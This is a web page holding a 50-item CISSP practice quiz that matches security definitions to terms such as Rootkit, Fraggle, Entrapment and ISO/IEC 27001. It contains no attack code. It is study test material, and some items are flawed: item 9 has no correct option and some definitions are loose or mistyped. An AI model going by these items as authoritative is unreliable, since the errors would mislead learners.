SUBJECTS
|
BROWSE
|
CAREER CENTER
|
POPULAR
|
JOIN
|
LOGIN
Business Skills
|
Soft Skills
|
Basic Literacy
|
Certifications
About
|
Help
|
Privacy
|
Terms
|
Email
Search
Test your basic knowledge |
CISSP Certified Information Systems Security Professional
Start Test
Study First
Subjects
:
certifications
,
it-skills
,
cissp
Instructions:
Answer 50 questions in 15 minutes.
If you are not ready to take this test, you can
study here
.
Match each statement with the correct term.
Don't refresh. All questions and answers are randomly picked and ordered every time you load a test.
This is a study tool. The 3 wrong answers for each question are randomly chosen from answers to other questions. So, you might find at times the answers obvious, but you will see it re-enforces your understanding as you take the test each time.
1. A BCP testing type - a test that answers the question: Can the organization operate at the alternate location only?
Full Test (Full Interruption)
Database Shadowing
War Dialing
UPS
2. A peripheral data storage device that may be found inside a desktop or laptop as permanent storage solution. The hard disk may also be a transportable version and attached to a desktop or laptop.
Hard Disk
Administrative
Threat Agent
Hub
3. Substitution at the word or phrase level
Infrastructure
Monitor
Code
Access Control Attacks
4. A Denial of Service attack that exploits packet filter firewalls that only inspect the initial fragment of a fragmented packet.
Mixed Law System
Overlapping Fragment Attack
Consistency
Recovery
5. The past U.S. military accepted set of standards and processes for network evaluation and assurance - which combines function and assurance requirements
TNI (Red Book)
Emergency Procedures
Algorithm
Salami
6. Processes data at different classifications (security levels) and users with different clearances (security levels) can use the system.
Operational
Site Policy Awareness
Information Risk Management (IRM)
Multilevel Security System
7. Momentary loss of power
Basics Of Secure Design
Business Continuity Planning (BCP)
Fault
Exercise
8. Uses a role-based method to determine access rights and permissions. Role based access control is based on the user's role and responsibilities within the company.
Non-Discretionary Access Control
Risk
Surge Suppressor
Computer Forensics
9. Power surge
Inheritance
MOM
Electrostatic Discharge
Birthday Attack
10. Written internalized or nationalized norms that are internal to an organization
Object
Injection
Standard
Common Criteria
11. The restoration of computer files from backup media to restore programs and production data to the state that existed at the time of the last safe backup.
Evidence
Site Policy
Data Recovery
Inheritance
12. Malware that subverts the detective controls of an operating system
Multi-Core
Aggregation
Storage Area Network (SAN)
Rootkit
13. The assignment of a level of sensitivity to data (or information) that results in the specification of controls for each level of classification.
Classification
Business Continuity Steering Committee
Mantrap (Double Door System)
Fault Tolerance
14. Weak evidence
Open Mail Relay Servers
Hearsay
Domain
Business Unit Recovery
15. Adversary intercepts encrypted communications - decrypts - views - encrypts - and send along to the true destination
Hash Function
Slack Space
Man-In-The-Middle Attack
System Downtime
16. An approach by an organization that will ensure its recovery and continuity in the face of a disaster or other major outage. Plans and methodologies are determined by the organizations strategy.
Contact List
Recovery Strategy
Incident Manager
Logic Bomb
17. Process of planning for and/or implementing procedures for the repair or relocation of the primary site and its contents - and for the restoration of normal operations at the primary site.
Entrapment
Identification
Alert
Restoration
18. Alerts personnel to the presence of a fire
Fire Detection
Data Marts
Trojan Horse
Hacker
19. Layer 1 network device that is used to connect network segments together - but provides no traffic control (a concentrator).
Domain
Repeaters
Orange Book C2 Classification
Application Programming Interface
20. Granular decision by a system of permitting or denying access to a particular resource on the system
Security Blueprint
Authorization
Quantitative Risk Analysis
Electromagnetic Interference (EMI)
21. Agreement between two organizations (or two internal business groups) with basically the same equipment/same environment that allows each one to recover at each other's site.
Life Cycle of Evidence
Reciprocal Agreement
Message Digest
Running Key
22. Demonstrate the actual ability to recover and can verify the compatibility of backup facilities
Labeling
BCP Testing Drills and Exercises
Data Diddler
Activation
23. Indivisible - data field must contain only one value that either all transactions take place or none do
Atomicity
Quantitative Risk Analysis
Orange Book A Classification
Bit
24. Key
Cryptovariable
Crisis
Highly Confidential
Tort
25. To segregate for the purposes of labeling
Compartmentalize
UPS
Restoration
Assembler
26. Organization way of classifying data by factors such as criticality - sensitivity and ownership.
Classification Scheme
Incident Manager
Content Dependent Access Control
Structured Walkthrough
27. Induces a crime - tricks a person - and is illegal
Isolation
Kernel
Initialization Vector
Entrapment
28. An asymmetric cryptography mechanism that provides authentication.
Digital Signature
Wait
Substitution
Double Blind Testing
29. OOP concept of a distinct copy of the class
Patent
Reciprocal Agreement
Object
BCP Testing Drills and Exercises
30. The response of an organization to a disaster or other significant event that may significantly impact the organization - its people - or its ability to function productively.
Compression
Key Clustering
Incident Response
Critical Functions
31. Joining two pieces of text
Business Impact Assessment (BIA)
Top Secret
Information Flow Model
Concatenation
32. Server optimized for providing file-based data storage to the network. Unlike a File Server - a NAS unit has no input or output devices - and the OS is dedicated for providing storage services.
Network Attached Storage (NAS)
Incident
Radio Frequency Interference (RFI)
Electrostatic Discharge
33. Can be statistical (monitor behavior) or signature based (watch for known attacks)
Plaintext
IDS Intrusion Detection System
Virtual Memory
Spam
34. Malware that uses the trust on a website to redirect users to untrusted websites which captures data or installs more malware
Cross-Site Scripting
Standard
Data Warehouse
Simulation Test
35. Business and technical process of applying security software updates in a regulated periodic way
Patch Management
Detective
Concatenation
Full Test (Full Interruption)
36. Control category- to record an adversary's actions
Data Dictionary
Incident Response Team
Event
Detective
37. To move from location to location - keeping the same function
Job Rotation
Strategic
Watermarking
Database Shadowing
38. Disruption of operation of an electronic device due to a competing electromagnetic field.
Architecture
Data Custodian
Custodian
EMI
39. Try a list of words in passwords or encryption keys
Dictionary Attack
Cache
Honeypot
Restoration
40. Requirement of access to data for a clearly defined purpose
Cryptanalysis
Journaling
Need-To-Know
Recovery
41. Real-time - automatic and transparent backup of data.
Database Replication
Supervisor Mode (monitor - system - privileged)
Kerckhoff's Principle
Remote Journaling
42. Vehicle or tool that exploits a weakness
User Mode (problem or program state)
Threats
Cross Certification
Brouter
43. Alternate facility - other than the primary production site - where duplicated vital records and documentation may be stored for use during disaster recovery.
Plaintext
Injection
Exercise
Off-Site Storage
44. A Denial of Service attack initiated by sending spoofed UDP echo request to IP broadcast addresses. (See Smurf)
Digital Signature
Framework
Fraggle
Off-Site Storage
45. uropean standard for IT security criteria. Wasn't universally adopted. - Consists of four components:1. "Security Target" 2. "Target of Evaluation" or ToE. 3. Functional Levels. 4. Assurance Levels.
Ethics
ISO/IEC 27001
Information Technology Security Evaluation Criteria - ITSEC
Blind Testing
46. The process of identifying - accessing - reducing risk to an acceptable level - and implementing the right countermeasure to maintain that level of risk
Information Risk Management (IRM)
Trapdoors (Backdoors) (Maintenance Hooks)
Entrapment
Storage Area Network (SAN)
47. A formal announcement by pre-authorized personnel that a disaster or severe outage is predicted or has occurred and that triggers pre-arranged mitigating actions (e.g. A move to an alternate site.)
Residual Risk
Record Level Deletion
ff Site
Declaration
48. The one person responsible for data - its classification and control setting
Wireless Fidelity (Wi-Fi )
UPS
Class
Information Owner
49. Highly sensitive internal documents that could seriously damage the organization if such information were lost or made public.
Top Secret
One Time Pad
Business Interruption Insurance
Distributed Processing
50. Standard for the establishment - implementation - control - and improvement of the Information Security Management System
SYN Flooding
ISO/IEC 27001
User
Policy
